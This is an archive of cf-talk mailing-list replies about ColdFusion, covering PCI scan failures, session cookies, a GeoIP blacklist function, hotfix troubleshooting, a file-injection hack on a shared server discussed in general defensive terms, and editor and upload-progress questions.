Justin, I don't think that would work though, depending on the level of compliance and the SAQ being completed I don't think any vendor will allow that exemption regardless of if credit card information is visible or not. If an attacker is allowed any access to a user session and can harvest any personally identifiable information it could affect security of any credit card entered into the site. Best Regards, Donnie Bachan Nitendo Vinces - By Striving You Shall Conquer == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Tue, Mar 6, 2012 at 2:41 PM, Justin Scott leviat...@darktech.org wrote: Justin, thanks for the reply, and I get your point, but I can't break out the registration process into a standalone site quickly. There must be a fairly quick solution to this problem. Surely, I can't be the first to deal with this. Another option might be to ask your scanning vendor for an exception to that scanning rule. If you can demonstrate to them that no credit card information is accessible through the user's account (e.g. the card number isn't visible anywhere, etc., and it really doesn't matter if the session is hijacked from the standpoint of credit card security) and explain the situation, they are generally willing to work with you on this kind of thing. Remember, their scanning rules are designed to cover the widest possible threat model. If you have specific needs that don't fit into that model but have compensating controls in place, it shouldn't be a problem (e.g. this used to be an issue with the incremental session IDs which the scanners check for, but paired with the random session token as a compensating control they would always make an exception for this rule when asked). -Justin Sco ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:350260 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Failed PCI Compliance test on CF9.01
Hi Robert, I'm not sure if I'm missing something but shouldn't you have setClientCookies to Yes? Otherwise you'd have to pass the JSESSIONID in the url on each request. Best Regards, Donnie Bachan Nitendo Vinces - By Striving You Shall Conquer == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Tue, Mar 6, 2012 at 3:33 PM, Robert Rhodes rrhode...@gmail.com wrote: For both Phillip and Donnie -- I just set the site up for database storage for the client session in the cf admin (server settings - client variables), and I see data going in those two tables, but I am still losing the session state when moving from https to http. I have this set in my application.cfm: clientmanagement=Yes sessionmanagement=Yes setclientcookies=No clientstorage=MyDSN What am I doing wrong? ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:350268 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: GeoIP for Coldfusion?
Although this isn't a completely free solution we've used it with very good success without any updates for a while now. http://www.maxmind.com/app/geoip_features. If you are using it for just country level access for $50 it's not a bad investment. I've included some code for accessing checking the IP, once you have the database loaded. Please note that the java database is much, much faster than using the data in a database table. cffunction name=getIsBadIP access=public returntype=boolean output=false cfargument name=theIP default= required=false type=string / cfset var isBadIP = false / cfset var clientip = arguments.theIP / cfset var aIPParts = '' / cfset var iIPNum = '' / cfset var getIP = '' / cfset var getBlackListed = '' / !--- If no IP passed use CGI.REMOTE_ADDR if exists --- cfif not len(clientIP) cfif structKeyExists(CGI,REMOTE_ADDR) and len (CGI.REMOTE_ADDR) cfset clientip = CGI.REMOTE_ADDR / /cfif /cfif !--- Check that this is a valid country, if not no actions to be performed --- !--- Perform the GEOIP limiting --- !--- Check if the IP address is provided --- cfif len (clientIP) cfset aIPParts = listToArray(clientip, .) / cfif arrayLen(aIPParts) eq 4 and isNumeric(aIPParts[1]) and isNumeric(aIPParts[2]) and isNumeric(aIPParts[3]) and isNumeric(aIPParts[4]) cfset iIPNum = (aIPParts[1] * (256^3)) + (aIPParts[2] * (256^2)) + (aIPParts[3] * (256^1)) + (aIPParts[4]) / cfquery name=getIP datasource=#getDatasource()# SELECT TOP 1 country FROM GeoIP WHERE CAST(#iIPNum# AS bigint) between CAST(begin_num AS bigint) and CAST(end_num AS bigint) /cfquery !--- Check if the country is in the bad range --- cfif getIP.recordcount cfquery name=getBlackListed datasource=#getDatasource()# SELECT * FROM countryBlacklist WHERE country = cfqueryparam cfsqltype=cf_sql_varchar value=#getIP.country# / /cfquery cfif getBlackListed.recordcount cfset isBadIP = true / /cfif /cfif /cfif /cfif cfreturn isBadIP / /cffunction Hope this helps. Best Regards, Donnie Bachan Nitendo Vinces - By Striving You Shall Conquer == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Sun, Dec 25, 2011 at 5:56 AM, Phillip Vector vec...@mostdeadlygame.com wrote: Is there a server side solution for GeoIP that I can use? I'd like to make up some CF code that can detect when sites are connecting in areas we don't serve and direct them to a different page. Is there any (free) solutions for ColdFusion to detect where an IP is located? ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:349237 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: GeoIP for Coldfusion?
FYI, http://www.maxmind.com/app/geolitecity, best to check with them about your particular use case to ensure you are good to use the free version. Best Regards, Donnie Bachan Nitendo Vinces - By Striving You Shall Conquer == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Sun, Dec 25, 2011 at 4:18 PM, Phillip Vector vec...@mostdeadlygame.com wrote: *nods* I was looking for city and state actually. and it would need to be free. I can't drop $370 on this. On Sun, Dec 25, 2011 at 3:48 AM, Donnie Bachan (Gmail) donnie.bac...@gmail.com wrote: Although this isn't a completely free solution we've used it with very good success without any updates for a while now. http://www.maxmind.com/app/geoip_features. If you are using it for just country level access for $50 it's not a bad investment. I've included some code for accessing checking the IP, once you have the database loaded. Please note that the java database is much, much faster than using the data in a database table. cffunction name=getIsBadIP access=public returntype=boolean output=false cfargument name=theIP default= required=false type=string / cfset var isBadIP = false / cfset var clientip = arguments.theIP / cfset var aIPParts = '' / cfset var iIPNum = '' / cfset var getIP = '' / cfset var getBlackListed = '' / !--- If no IP passed use CGI.REMOTE_ADDR if exists --- cfif not len(clientIP) cfif structKeyExists(CGI,REMOTE_ADDR) and len (CGI.REMOTE_ADDR) cfset clientip = CGI.REMOTE_ADDR / /cfif /cfif !--- Check that this is a valid country, if not no actions to be performed --- !--- Perform the GEOIP limiting --- !--- Check if the IP address is provided --- cfif len (clientIP) cfset aIPParts = listToArray(clientip, .) / cfif arrayLen(aIPParts) eq 4 and isNumeric(aIPParts[1]) and isNumeric(aIPParts[2]) and isNumeric(aIPParts[3]) and isNumeric(aIPParts[4]) cfset iIPNum = (aIPParts[1] * (256^3)) + (aIPParts[2] * (256^2)) + (aIPParts[3] * (256^1)) + (aIPParts[4]) / cfquery name=getIP datasource=#getDatasource()# SELECT TOP 1 country FROM GeoIP WHERE CAST(#iIPNum# AS bigint) between CAST(begin_num AS bigint) and CAST(end_num AS bigint) /cfquery !--- Check if the country is in the bad range --- cfif getIP.recordcount cfquery name=getBlackListed datasource=#getDatasource()# SELECT * FROM countryBlacklist WHERE country = cfqueryparam cfsqltype=cf_sql_varchar value=#getIP.country# / /cfquery cfif getBlackListed.recordcount cfset isBadIP = true / /cfif /cfif /cfif /cfif cfreturn isBadIP / /cffunction Hope this helps. Best Regards, Donnie Bachan Nitendo Vinces - By Striving You Shall Conquer == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Sun, Dec 25, 2011 at 5:56 AM, Phillip Vector vec...@mostdeadlygame.com wrote: Is there a server side solution for GeoIP that I can use? I'd like to make up some CF code that can detect when sites are connecting in area ~| Order the Adobe Coldfusion Anthology
Re: URGENT: problem with latest hotfix
Did you ensure that all the old jar files referenced in point 5 were removed? You need to stop all the instances and remove the jar files, then attempt to restart. Best Regards, Donnie Bachan Nitendo Vinces - By Striving You Shall Conquer == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Wed, Dec 14, 2011 at 9:14 PM, John M Bliss bliss.j...@gmail.com wrote: Event Type: Error Event Source: ColdFusion 8 Application Server Event Category: None Event ID: 263 Date: 12/14/2011 Time: 2:59:12 PM User: N/A Description: The ColdFusion 8 Application Server service killed process with pid 6916 (no such PID running on server any longer). Event Type: Error Event Source: ColdFusion 8 Application Server Event Category: None Event ID: 261 Date: 12/14/2011 Time: 2:59:12 PM User: N/A Description: The ColdFusion 8 Application Server service could not be started within 240 seconds. Increase the server startup timeout value using C:\ColdFusion8\runtime\bin\jrunsvc.exe -starttimeout seconds ColdFusion 8 Application Server. On Wed, Dec 14, 2011 at 3:02 PM, Wil Genovese jugg...@trunkful.com wrote: what error? and read this on the subject of a patch failing http://www.trunkful.com/index.cfm/2011/3/7/When-the-Patch-Fails Also, if the Feb Security patch also broke CF 8.0.1 if HotFix 4 was not already applied. http://www.trunkful.com/index.cfm/2011/3/31/ColdFusion-Security-Update-Breaks-ColdFusion Wil Genovese Sr. Web Application Developer/ Systems Administrator CF Webtools www.cfwebtools.com wilg...@trunkful.com www.trunkful.com On Dec 14, 2011, at 2:59 PM, John M Bliss wrote: Following instructions for 8.01 here: http://kb2.adobe.com/cps/925/cpsid_92512.html ...and CF Server service is not starting back up. Anyone have any advice for me? -- John Bliss - http://about.me/jbliss ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:349146 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: URGENT: problem with latest hotfix
Out of curiousity, did you perform the steps in Section 1 or Section 2? Donnie Bachan Nitendo Vinces - By Striving You Shall Conquer == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Wed, Dec 14, 2011 at 9:26 PM, John M Bliss bliss.j...@gmail.com wrote: Yes. I (of course) did it quickly because I was attempting to keep downtime to a minimum: - click yes on the are you sure you want to delete dialog - see that files are gone - click start service On Wed, Dec 14, 2011 at 3:19 PM, Donnie Bachan (Gmail) donnie.bac...@gmail.com wrote: Did you ensure that all the old jar files referenced in point 5 were removed? You need to stop all the instances and remove the jar files, then attempt to restart. Best Regards, Donnie Bachan Nitendo Vinces - By Striving You Shall Conquer == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Wed, Dec 14, 2011 at 9:14 PM, John M Bliss bliss.j...@gmail.com wrote: Event Type: Error Event Source: ColdFusion 8 Application Server Event Category: None Event ID: 263 Date: 12/14/2011 Time: 2:59:12 PM User: N/A Description: The ColdFusion 8 Application Server service killed process with pid 6916 (no such PID running on server any longer). Event Type: Error Event Source: ColdFusion 8 Application Server Event Category: None Event ID: 261 Date: 12/14/2011 Time: 2:59:12 PM User: N/A Description: The ColdFusion 8 Application Server service could not be started within 240 seconds. Increase the server startup timeout value using C:\ColdFusion8\runtime\bin\jrunsvc.exe -starttimeout seconds ColdFusion 8 Application Server. On Wed, Dec 14, 2011 at 3:02 PM, Wil Genovese jugg...@trunkful.com wrote: what error? and read this on the subject of a patch failing http://www.trunkful.com/index.cfm/2011/3/7/When-the-Patch-Fails Also, if the Feb Security patch also broke CF 8.0.1 if HotFix 4 was not already applied. http://www.trunkful.com/index.cfm/2011/3/31/ColdFusion-Security-Update-Breaks-ColdFusion Wil Genovese Sr. Web Application Developer/ Systems Administrator CF Webtools www.cfwebtools.com wilg...@trunkful.com www.trunkful.com On Dec 14, 2011, at 2:59 PM, John M Bliss wrote: Following instructions for 8.01 here: http://kb2.adobe.com/cps/925/cpsid_92512.html ...and CF Server service is not starting back up. Anyone have any advice for me? -- John Bliss - http://about.me/jbliss ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:349148 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: URGENT: problem with latest hotfix
Out of curiosity, did you follow steps in Section 1 or Section 2? ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:349149 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Question about hack
Hi Mark, I only mentioned cfexecute because of the permissions set on our specific case. Your info seems most likely. I did notice that there was a cfm file created with a call to cfexecute on the webroot so this should be a check as well. best regards Donnie On 4/13/09, Nick Gleason n.glea...@citysoft.com wrote: Donnie, Mark, Our research so far seems to support marks's analysis of this problem. There are still some unknowns here so that may change. But, changing your FTP accounts and setting your FTP server to ban IPs after a certain number of failed login attempts will prevent most brute force attempts on FTP. Our server admin didn't do that which appears to have been a mistake. Nick . -Original Message- From: Mark Kruger [mailto:mkru...@cfwebtools.com] Sent: Monday, April 13, 2009 1:14 PM To: cf-talk Subject: RE: Question about hack Donnie, I believe this is the same attack I have been helping another customer with and it does not appear to be related to CF. Instead, it appears to start with a malware install of some kind on the server (and possibly a root kit) and then progress to the creation of accounts and the changing of file permissions. Another theory gaining weight (and illustrating that we don't know much yet) is that this attack is an agent on a client computer that piggybacks onto FTP - which explains a few things but not everything. I'm guessing some combination at this point. Anyway, I agree that cfexecute is a dangerous tag that needs to be controlled, but it does not appear to be the cuprit. All of this advice is good, but the only place that CF comes into play on this particular hack happens to be the propensity to use index.cfm as the home page script. The attack targets index.* files and affects (on the server I am working with) Index.cfm, index.html and index.php etc. -Mark ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321565 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Server Monitoring
I second Nagios. You can monitor the port required and get alerts by email or sms (if available) On 4/14/09, Mike Chabot mcha...@gmail.com wrote: Oops. You did mention that you run CF8. Have you explored the monitoring feature built into CF8 yet? -Mike Chabot On Tue, Apr 14, 2009 at 10:04 AM, Mike Chabot mcha...@gmail.com wrote: If your goal is to diagnose a mystery database issue that is a definite problem, I would use a database monitoring tool, such as MS SQL Profiler. Are you aware of the professional database monitoring tools, such as the ones Quest and Idera make? Where Web site monitoring of the database helps is to ensure that the Web server can connect to the database server, but that doesn't sound like the problem you are describing. What database are you running and what version of CF are you running? I ask about the CF version because CF8 has the query profiling feature built into it, although I would still favor a database query analysis tool if you know the problem is the database. -Mike Chabot On Tue, Apr 14, 2009 at 10:27 AM, Rob Parkhill robert.parkh...@gmail.com wrote: Good Day, Can't come up with a better title, so here is what I want to do. I have two servers, one DB and one web. My DB server is having MASSIVE issues at the moment. CPUs blowing up, and the server shutting down randomly, at night. I would like to use the webserver (with CF8) to monitor the status of the DB server, and was wondering what everyone thought was the best method? I was thinking of checking to see if the domain server (which is controlled by the DB server) was in existence, although I am not sure if that is possible with CF. The other thing I could test would be the connection to the database, but I can't seem to find the references to accessing the admin tools in CF8, where I thought that would be possible, so any resource direction would be much appreciated. Thanks, Rob ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321573 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Question about hack
Hi Nick, I know this post is a bit late but to your original question, that attack is as a result of incorrect file/iis permissions and is not an XSS attack. I would even bet that you are on a shared server (at HMS) since one of my client sites had this exact same problem. The attacker would have gained access to the file system (possibly via FTP) and executed code that injected the code into all index.* files on the server (not just your hosting account). We have had a lot of problems trying to get this sorted out. It appears that the issue was with security related to the windows script host and/or CFEXECUTE. The only thing you can do to prevent this is work with your hosting provider to secure the system or move to a VPS or dedicated account and make sure your FTP accounts are secure. HTH Donnie Bachan Nitendo Vinces - By Striving You Shall Conquer == The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. On Mon, Apr 13, 2009 at 1:30 PM, Richard White rich...@j7is.co.uk wrote: hi dave, i have scripts that write to the file system as well. what would i need to do to secure them, do you have a link that i could read in relation to this as i am a little lost as to what to do thanks We are having to scrub our files to remove the injected code (which is being written directly to the files as the result of the hack allowing FULL CONTROL for the Everyone user on the machine. Have you determined a solution for removing/preventing this? First, audit your code to find any scripts that can write to the filesystem. Second, audit your code to find any scripts that pass unfiltered user input to the database. Third, fix that code. Fourth, configure filesystem permissions properly to prevent CF or your database from writing to the web server's webroot. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321551 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: CFEclipse with Aptana
Pete, I think for it to work correctly you need to enable line numbers in both places (General Editors Text Editors and within the CFEclipse Editor panels). I am using Eclipse with both Aptana and CFEclipse installed and was having a similar problem when one or the other was checked. I know that you are using the Aptana install with CFEclipse as a plugin but I don't think there is really a difference because the Aptana docs say that you have to enable line numbers by General Editors Text Editors (see http://www.aptana.com/docs/index.php/Displaying_or_hiding_line_numbers). If all else fails, you could always try it on a clean install with the latest updates. BTW, are you on Windows or Mac? HTH. Best Regards, Donnie On Feb 2, 2008 1:45 PM, Pete Ruckelshaus [EMAIL PROTECTED] wrote: I have tried a variety of combinations of checking, unchecking, and rechecking the line number options in both places, to no avail. Also, if I wasn't clear, I'm using the Aptana install and not Eclipse with the Aptana plugin. Pete On Feb 2, 2008 10:14 AM, James Davis [EMAIL PROTECTED] wrote: Pete, Make sure you check the Show Line Numbers under the CFEclipse options. That threw me off when i first started using it. In the Preferences, it's under CFEclipseEditor. If you're just checking under GeneralEditorsText Editors, that Show Line Numbers option will not show line numbers in CFM pages. James Davis Kaleida Systems From: Pete Ruckelshaus [mailto:[EMAIL PROTECTED] Sent: Sat 2/2/2008 9:38 AM To: CF-Talk Subject: CFEclipse with Aptana I've been using Aptana (http://www.aptana.org/) with my students in my web design class (I teach in a public school district and didn't inherit any budget for software, Aptana is both free and very very good). I've actually grown to prefer it over HomeSite+ for HTML, JS, and CSS; it's based on Eclipse, so you can install Eclipse plug-ins -- including cfeclipse -- with no problem. The only thing that's keeping me from using it for all of my ColdFusion development is that for some reason, I can't get line numbers to show when editing CFM files, and the show line numbers setting in the settings applet won't save the setting. Has anyone else encountered this issue, and if so, is there a fix? Thanks, Pete ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;160198600;22374440;w Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:298004 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Upload progress bar
George, I agree with the idea of just displaying some sort of animation, if something is taking too long you can always say still working...hang on! but the entire idea is to give the user an indicator letting them know that something is happening and the upload hasn't died. You will need to include proper error handling and timeouts. It really isn't something you want to spend hours on because in the end it really isn't that important to show that 10 MBs out of 100MBs have been uploaded (and if you are uploading something that big via the browser I would discourage that! IMHO). Will, Why limit yourself: http://www.ajaxload.info/ we Best Regards, Donnie On Feb 2, 2008 11:35 AM, Will Tomlinson [EMAIL PROTECTED] wrote: I went ahead and put up a gif I use. http://wtomlinson.com/wait30.gif HTH, Will ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;160198600;22374440;w Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:298008 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4